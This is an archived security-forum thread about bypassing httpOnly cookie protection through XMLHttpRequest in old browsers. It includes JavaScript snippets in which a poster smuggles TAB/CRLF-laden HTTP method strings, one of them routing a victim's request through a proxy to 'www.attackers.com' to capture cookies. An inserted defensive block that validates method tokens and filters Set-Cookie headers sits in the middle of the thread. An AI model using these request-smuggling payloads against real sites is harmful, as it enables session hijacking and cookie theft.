Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Stealing httpOnly cookies with XHR
Posted by: lpilorz
Date: December 31, 2006 09:48AM

I hope I didn't miss someone writing about it here already:

It seems that IE6 doesn't allow reading cookies from xhr.getResponseHeader('Set-Cookie') or xhr.getAllResponseHeaders(). At least, as long as the xhr method is set to "GET". If you change it into e.g. "GET x", you can read all cookies from Set-Cookie headers (including httpOnly cookies). Do you know any place I could read about other ways to bypass httpOnly with XHR?

( short testpage: http://lukasz.pilorz.net/testy/httponly/ - works for me in IE6 on Win2k/XP, doesn't work in IE7 on Vista)



Edited 2 time(s). Last edit at 12/31/2006 09:55AM by lpilorz.

Re: Stealing httpOnly cookies with XHR
Posted by: jungsonn
Date: December 31, 2006 11:06AM

Quote

If you change it into e.g. "GET x"

How about that! Great find! I haven't seen this yet. Good example where I guess RegExes fail to work.

Re: Stealing httpOnly cookies with XHR
Posted by: lpilorz
Date: December 31, 2006 07:06PM

It seems I was wrong a bit (hey, I won't look for IE bugs in the middle of a New Year's Eve party any more ;)):

The problem with reading cookies with XHR comes from caching, not from built-in IE protection. Anyway, changing the GET/POST method into something else ("GET x" or "WHATEVER YOU WISH") allows bypassing those caching problems.

Reading cookies from the Set-Cookie header with XHR isn't very useful either - or am I wrong? Usually you get that header before you are able to use XHR.

By the way, Stefan Esser's httpOnly extension for Firefox seems to be immune to XHR cookie stealing.



Edited 1 time(s). Last edit at 12/31/2006 07:10PM by lpilorz.

Re: Stealing httpOnly cookies with XHR
Posted by: kuza55
Date: December 31, 2006 07:49PM

lpilorz Wrote:
-------------------------------------------------------
> Reading cookies from Set-Cookie header with XHR
> isn't very useful either - or am I wrong? Usually
> you get that header before you are able to use
> XHR.
>
> By the way, Stefan Esser's httpOnly extension for
> Firefox seems to be immune for XHR cookie
> stealing.


Generally it's not very useful, no, but if you have pages where you can somehow force the website to regenerate your session cookie or something (unlikely, but possible) and resend it to you, then it would be useful.

And I don't think it's Stefan Esser's extension being immune, I think it's just Firefox being immune. I say this because it doesn't work for me and I don't have the extension installed since I haven't gotten around to upgrading to FF2.0 yet - yes, lazy me, but why can't they make the automatic update do it?

Re: Stealing httpOnly cookies with XHR
Posted by: lpilorz
Date: January 01, 2007 05:36AM

You're right about that cookie regeneration. I wonder how many web apps have such pages (not many, from what I know).

XHR on the test page uses the "WHATEVER YOU WISH" HTTP method, which causes Firefox to throw an error - that's the reason it doesn't show cookies. If you change it into GET, httpOnly (and all other) cookies should appear. The httpOnly extension overwrites these cookies with some random value.

By the way, browsers give different results for xhr.getResponseHeader("Set-Cookie"). IE6 returns only the first Set-Cookie header, while Opera 9 (which also allows the "WHATEVER YOU WISH" HTTP method) returns the combined values of all the Set-Cookie headers.

Testpage with GET method set correctly: http://lukasz.pilorz.net/testy/httponly/get.php

Re: Stealing httpOnly cookies with XHR
Posted by: jungsonn
Date: January 01, 2007 07:37AM

I've got a question: I'm modding my own version of Firefox; trouble is, I don't know exactly what that HttpOnly is doing and whether you can run into trouble at sites that require JavaScript to access cookies. I understand it blocks JavaScript from reading the cookies, but then my question is: do some websites still use JavaScript to read the cookies? I think there must be a reason why FF did not implement this from the beginning? If anyone can elaborate on this I'll be happy :)

Re: Stealing httpOnly cookies with XHR
Posted by: WhiteAcid
Date: January 01, 2007 10:01AM

Jungson. It's the developers of the website that set the HTTPOnly flag. If it's not set, then the cookie isn't HTTPOnly. So... if they've set the flag and do use document.cookie, then it's their fault that the site dies.

I'm guessing a reason Mozilla didn't implement it is because it's not a standard. I know PHP supports the creation of HTTPOnly cookies, I suppose ASP does, does anyone know if Perl can do it? (besides manually writing the header line)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Stealing httpOnly cookies with XHR
Posted by: lpilorz
Date: January 01, 2007 02:54PM

Yes, Perl's CGI::Cookie has an httponly attribute:
http://search.cpan.org/dist/CGI.pm/CGI/Cookie.pm

Re: Stealing httpOnly cookies with XHR
Posted by: rsnake
Date: January 02, 2007 02:04PM

Jungsonn, I have seen a number of examples where applications have JavaScript that reads from cookies. One reason for this is the "Hello soandso, welcome to our site." For some reason or another they have chosen to write that with a cookie (probably to reduce server load). That can lead to potential XSS if you can force the user to change their cookie to something, assuming the JavaScript doesn't do validation. But anyway, yes, there are a number of applications that do exactly this that may or may not use HTTPOnly cookies. Also, for those of you who aren't aware, HTTPOnly isn't just non-standard, it actually can break certain older browsers, causing the page not to load (WebTV and IE5.0 on Mac come to mind). So you need to build a whitelist or just not worry about that subset of users.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Stealing httpOnly cookies with XHR
Posted by: jungsonn
Date: January 02, 2007 02:32PM

Thanks, so it can be implemented in new versions of FF I guess? I can remember I've seen it, but that was very early, like in 1998 or so.

Re: Stealing httpOnly cookies with XHR
Posted by: rsnake
Date: January 02, 2007 03:05PM

Well it doesn't break anything in Firefox, but for some reason they've had problems making it work. Stefan seemed to be able to do it but the developers at Firefox feel it will break things or it is difficult to know what context JavaScript should be allowed to see cookies or not.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Stealing httpOnly cookies with XHR
Posted by: Kanatoko
Date: January 06, 2007 07:53AM

Cool topic, lpilorz :)

On IE, we can use 0x09 in the xhr method.
So HRS (HTTP Request Smuggling) is possible with the following code:

example1:
-----
var method = "GET\x09/index.php\x09HTTP/1.1\r\nHost:foobar\r\n\r\nGET";
req.open( method, 'http://example.com/',false );
-----

example2:
-----
var method = "GET\x09/index.php\x09HTTP/1.1\r\nHost:foobar\r\nX-Foo:";
req.open( method, 'http://example.com/',false );
-----

It works with Apache.
I think 'TRACE\x09...' and 'POST\x09...' will also work. ( Not tested yet )

This technique can be used to steal httpOnly cookies, in some cases.

--
Kanatoko
http://www.jumperz.net/

Re: Stealing httpOnly cookies with XHR
Posted by: Kanatoko
Date: January 06, 2007 12:54PM

Under the following conditions:
- The user is using a proxy (tested on Apache and Squid)
- The proxy disables the TRACE method
- The user is using IE
- www.example.com has an XSS hole
- www.example.com uses cookies with the httpOnly flag
- www.example.com disables the TRACE method

It is possible to steal cookies with:
(please replace 'htp://' with 'http://')
-----
method = "GET\x09htp://www.attackers.com/\x09HTTP/1.1\r\nHost:www.attackers.com\r\nX-Foo:";
req.open( method, "http://www.example.com/", false );
req.send( null );
-----

#By the way, how can I avoid 'http://...' hyperlinking here?

--
Kanatoko
http://www.jumperz.net/



Edited 1 time(s). Last edit at 01/06/2007 01:00PM by Kanatoko.
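An added defensive example (my own code, not from any poster in this thread or from the test pages linked above): the checks a browser, proxy or XHR wrapper should apply against the two weaknesses raised in this thread. The first is the method string that carries TAB/CRLF into the request line (Kanatoko's posts); a conforming implementation rejects any method that is not an RFC 2616/7230 token. The second is Set-Cookie headers being readable through getResponseHeader/getAllResponseHeaders (lpilorz's earlier post); the later XMLHttpRequest specification lists Set-Cookie and Set-Cookie2 as forbidden response-header names, which the filter below mirrors. A small Set-Cookie parser that reports whether the HttpOnly attribute is present, the flag discussed for PHP and Perl above, rounds it out. Function names are mine and all inputs are constructed.

```javascript
// Added example, not part of the original thread. Constructed inputs only.

// RFC 2616 / RFC 7230 "token": one or more tchar, no SP/TAB/CR/LF or other CTLs.
const TOKEN_RE = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// True only for a well-formed HTTP method token. A method such as
// "GET\x09/index.php\x09HTTP/1.1\r\nHost:foobar\r\nX-Foo:" lets script write
// extra request lines, so anything that is not a bare token is refused.
function isValidMethodToken(method) {
  return typeof method === "string" && TOKEN_RE.test(method);
}

// Response headers an XHR must never expose to script (XMLHttpRequest/Fetch
// "forbidden response-header name"); compared case-insensitively.
const FORBIDDEN_RESPONSE_HEADERS = new Set(["set-cookie", "set-cookie2"]);

// Takes a raw getAllResponseHeaders()-style string ("Name: value\r\n...")
// and drops the cookie-setting headers, so a script cannot read HttpOnly
// cookies out of a response even when the server has just (re)issued them.
function stripForbiddenResponseHeaders(rawHeaders) {
  return rawHeaders
    .split(/\r?\n/)
    .filter((line) => {
      const idx = line.indexOf(":");
      if (idx < 0) return line.trim().length > 0; // keep odd lines, drop blanks
      const name = line.slice(0, idx).trim().toLowerCase();
      return !FORBIDDEN_RESPONSE_HEADERS.has(name);
    })
    .join("\r\n");
}

// Parses one Set-Cookie header value into name, value and attributes and
// reports whether it carries HttpOnly; useful for a response audit in a proxy
// or in an application test that checks session cookies are flagged.
function parseSetCookie(headerValue) {
  const [pair, ...attrs] = headerValue.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const attributes = {};
  for (const attr of attrs) {
    if (attr.length === 0) continue;
    const i = attr.indexOf("=");
    const key = (i < 0 ? attr : attr.slice(0, i)).trim().toLowerCase();
    attributes[key] = i < 0 ? true : attr.slice(i + 1).trim();
  }
  return {
    name: eq < 0 ? pair : pair.slice(0, eq),
    value: eq < 0 ? "" : pair.slice(eq + 1),
    httpOnly: Object.prototype.hasOwnProperty.call(attributes, "httponly"),
    attributes,
  };
}

// Runs the three checks over constructed samples, including the method
// strings quoted in this thread, and returns the outcomes for inspection.
function demo() {
  const methods = [
    "GET",
    "POST",
    "GET x",
    "WHATEVER YOU WISH",
    "GET\x09/index.php\x09HTTP/1.1\r\nHost:foobar\r\nX-Foo:",
  ];
  const rawHeaders =
    "Content-Type: text/html\r\nSet-Cookie: sid=abc123; HttpOnly\r\nX-Foo: bar\r\n";
  return {
    methodVerdicts: methods.map((m) => [JSON.stringify(m), isValidMethodToken(m)]),
    scriptVisibleHeaders: stripForbiddenResponseHeaders(rawHeaders),
    sessionCookie: parseSetCookie("sid=abc123; Path=/; HttpOnly"),
    themeCookie: parseSetCookie("theme=dark; Path=/"),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Only "GET" and "POST" pass the token check; "GET x", "WHATEVER YOU WISH" and the TAB/CRLF variant are all refused before any request line is built. The header filter leaves Content-Type and X-Foo visible and removes the Set-Cookie line, and the parser flags the sid cookie as HttpOnly while the theme cookie is not.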

Re: Stealing httpOnly cookies with XHR
Posted by: rsnake
Date: January 09, 2007 10:17AM

You could hyperlink one character like the colon h t t p [ u r l=h t t p : //ha.ckers.org]:[/url]whatever.com without all the spaces...

- RSnake
Gotta love it. http://ha.ckers.org

Re: Stealing httpOnly cookies with XHR
Posted by: maluc
Date: January 09, 2007 03:35PM

You could also bold the space character before it (bold because it's very short to type)

[ b ] [ / b ]http://test.com

test of it: http://test.com

-maluc



Edited 1 time(s). Last edit at 01/09/2007 03:36PM by maluc.
